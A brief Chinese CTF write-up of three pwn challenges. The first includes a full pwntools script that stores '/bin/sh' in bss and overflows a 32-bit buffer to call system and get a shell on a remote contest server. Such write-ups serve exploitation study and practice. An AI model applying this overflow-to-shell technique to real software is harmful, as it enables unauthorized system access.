0x13 [HNCTF 2022 Week1]ezr0p32 id2930
有sys也有一次特殊的输入机会,很显然的想告诉你要把/binsh输到bss
from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')
#context(log_level='debug')
#r=process("./ezr0p")
r=remote("node1.anna.nssctf.cn",28991)
elf=ELF("./ezr0p")
sysaddr=elf.plt["system"]
flagaddr=0x0804a080
r.recvuntil("name")
r.sendline("/bin/sh")
payload=b'a'*0x20+p32(sysaddr)+p32(0xdeadbeef)+p32(flagaddr)
r.sendline(payload)
r.interactive()
0x14 [GDOUCTF 2023]EASY PWN id3734
看一下逻辑,简单的溢出覆写
...然后我nc上去然后摁了那么多个a然后摁了个0回车一下出flag了
0x15 [HNCTF 2022 Week1]ret2shellcode id2934
简单的shellcode题 工具+返回一步跑通 懒得放exp了..